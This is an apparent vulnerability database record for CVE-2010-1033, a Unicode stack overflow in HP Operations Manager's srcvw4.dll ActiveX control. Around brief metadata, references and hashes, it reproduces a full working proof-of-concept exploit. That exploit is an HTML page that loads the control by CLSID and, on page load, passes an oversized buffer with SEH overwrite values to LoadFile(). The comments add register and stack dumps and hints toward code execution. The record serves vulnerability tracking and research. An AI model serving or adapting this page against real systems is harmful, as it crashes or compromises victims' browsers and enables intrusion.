ID

VAR-E-201004-0162


CVE

cve_id:CVE-2010-1033

Trust: 2.4

sources: BID: 39578 // PACKETSTORM: 88699 // EXPLOIT-DB: 12302 // EDBNET: 35857

EDB ID

12302


TITLE

HP Operations Manager 8.16 - 'srcvw4.dll' 'LoadFile()'/'SaveFile()' Remote Unicode Stack Overflow (PoC) - Windows dos Exploit

Trust: 1.0

sources: EXPLOIT-DB: 12302

DESCRIPTION

HP Operations Manager 8.16 - 'srcvw4.dll' 'LoadFile()'/'SaveFile()' Remote Unicode Stack Overflow (PoC). CVE-63931CVE-2010-1033 . dos exploit for Windows platform

Trust: 1.0

sources: EXPLOIT-DB: 12302

AFFECTED PRODUCTS

vendor:hpmodel:operations managerscope:eqversion:8.16

Trust: 1.0

vendor:hpmodel:operations managerscope:lteversion:<=8.16

Trust: 0.6

vendor:hpmodel:operations manager remotescope:eqversion:7.5/8.10/8.16

Trust: 0.5

vendor:hpmodel:openview operations manager for windowsscope:eqversion:8.16

Trust: 0.3

vendor:hpmodel:openview operations manager for windowsscope:eqversion:8.1

Trust: 0.3

vendor:hpmodel:openview operations manager for windowsscope:eqversion:7.5

Trust: 0.3

sources: BID: 39578 // PACKETSTORM: 88699 // EXPLOIT-DB: 12302 // EDBNET: 35857

EXPLOIT

<html>
<!--
|------------------------------------------------------------------|
| __ __ |
| _________ ________ / /___ _____ / /____ ____ _____ ___ |
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |
| |
| http://www.corelan.be:8800 |
| security@corelan.be |
| |
|-------------------------------------------------[ EIP Hunters ]--|

# HP Operations Manager <= v8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow PoC
# Found by: mr_me - http://net-ninja.net/
# Homepage: http://www.hp.com/
# CVE: CVE-2010-1033
# Tested on: Windows XP SP3 (IE 6 & 7)
# Marked safe for scripting: No
# Module path: C:\Program Files\HP\HP BTO Software\bin\srcvw4.dll
# HP's Advisory: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02078800
# Advisory: http://www.corelan.be:8800/advisories.php?id=10-027
# Greetz: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# ######################################################################################################
# Notes:
# - This is a 3rd party library by Tetradyne Inc (not from HP) but HP take full responsibility
# - /SafeSEH protected module
# - The SaveFile() function is also vulnerable to a unicode stack overflow.
# - Having '\x42' or 'B' as the 2nd byte of nseh will cause us to overwrite the address
# of seh handler itself and not the contents.
# - There is simply no code execution on this because there is no unicode friendly
# ppr's that I know of. However you could include other components, to get code execution.
# ######################################################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.

The Registers:

EAX 002BD012
ECX 000AEAAA
EDX 02A90024 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..
EBX 80070003
ESP 0013DA1C
EBP 0013DA70 UNICODE "Could not open file AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..
ESI 02A9258C UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..
EDI 00140000 ASCII "Actx "
EIP 024DA413 srcvw4.024DA413

The stack:

0013B600 00410041 A.A. iexplore.00410041
0013B604 00410041 A.A. iexplore.00410041
0013B608 00430043 C.C. Pointer to next SEH record
0013B60C 00420042 B.B. SE handler
0013B610 00440044 D.D.
0013B614 00440044 D.D.

And remember, its better to try and fail, then fail to try :-)
-->
<object classid='clsid:366C9C52-C402-416B-862D-1464F629CA59' id='boom' ></object>
<script language="JavaScript" defer>
function b00m()
{
var buffSize = 1072;
var x = unescape("%41");
var y = unescape("%44");
// 'B' or \x41 as the 2nd byte of nseh will destroy our SEH chain
var nseh = unescape("%43%43");
var seh = unescape("%42%42");
while (x.length<buffSize) x += x;
x = x.substring(0,buffSize);
while (y.length<buffSize) y += y;
y = y.substring(0,buffSize);
boom.LoadFile(x+nseh+seh+y);
}
</script>
<body onload="JavaScript: return b00m();">
<p><center>~ mr_me presents ~</p>
<p><b>HP Operations Manager <= v8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow PoC</b></center></p>
</body>
</html>

Trust: 1.0

sources: EXPLOIT-DB: 12302

EXPLOIT HASH

LOCAL

SOURCE

md5: dc9ff56da2c22e2fd47132c7b68a6ba9
sha-1: dfa0d6c5e7514164cdc714edb0bdd45d3978748f
sha-256: f6dcb05657875a0c205848a9a614db696f308ed1f94ec31aa62d579c64f81ee0
md5: dc9ff56da2c22e2fd47132c7b68a6ba9

Trust: 0.5

sources: PACKETSTORM: 88699

EXPLOIT LANGUAGE

html

Trust: 1.0

sources: EXPLOIT-DB: 12302

PRICE

Free

Trust: 2.4

sources: BID: 39578 // PACKETSTORM: 88699 // EXPLOIT-DB: 12302 // EDBNET: 35857

TYPE

'srcvw4.dll' 'LoadFile()'/'SaveFile()' Remote Unicode Stack Overflow (PoC)

Trust: 1.0

sources: EXPLOIT-DB: 12302

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

tag:overflow

Trust: 0.5

sources: PACKETSTORM: 88699

CREDITS

mr_me

Trust: 1.5

sources: PACKETSTORM: 88699 // EXPLOIT-DB: 12302

EXTERNAL IDS

db:NVDid:CVE-2010-1033

Trust: 2.4

db:EXPLOIT-DBid:12302

Trust: 1.6

db:EDBNETid:35857

Trust: 0.6

db:PACKETSTORMid:88699

Trust: 0.5

db:BIDid:39578

Trust: 0.3

sources: BID: 39578 // PACKETSTORM: 88699 // EXPLOIT-DB: 12302 // EDBNET: 35857

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2010-1033

Trust: 2.1

url:http://www.corelan.be:8800/advisories.php?id=10-027

Trust: 1.0

url:https://www.exploit-db.com/exploits/12302/

Trust: 0.6

url:https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-15-28^1745_4000_100__

Trust: 0.3

url:http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c02078800

Trust: 0.3

sources: BID: 39578 // PACKETSTORM: 88699 // EXPLOIT-DB: 12302 // EDBNET: 35857

SOURCES

db:BIDid:39578
db:PACKETSTORMid:88699
db:EXPLOIT-DBid:12302
db:EDBNETid:35857

LAST UPDATE DATE

2022-06-21T14:02:54.774000+00:00


SOURCES UPDATE DATE

db:BIDid:39578date:2010-04-19T00:00:00

SOURCES RELEASE DATE

db:BIDid:39578date:2010-04-19T00:00:00
db:PACKETSTORMid:88699date:2010-04-20T15:10:27
db:EXPLOIT-DBid:12302date:2010-04-20T00:00:00
db:EDBNETid:35857date:2010-04-20T00:00:00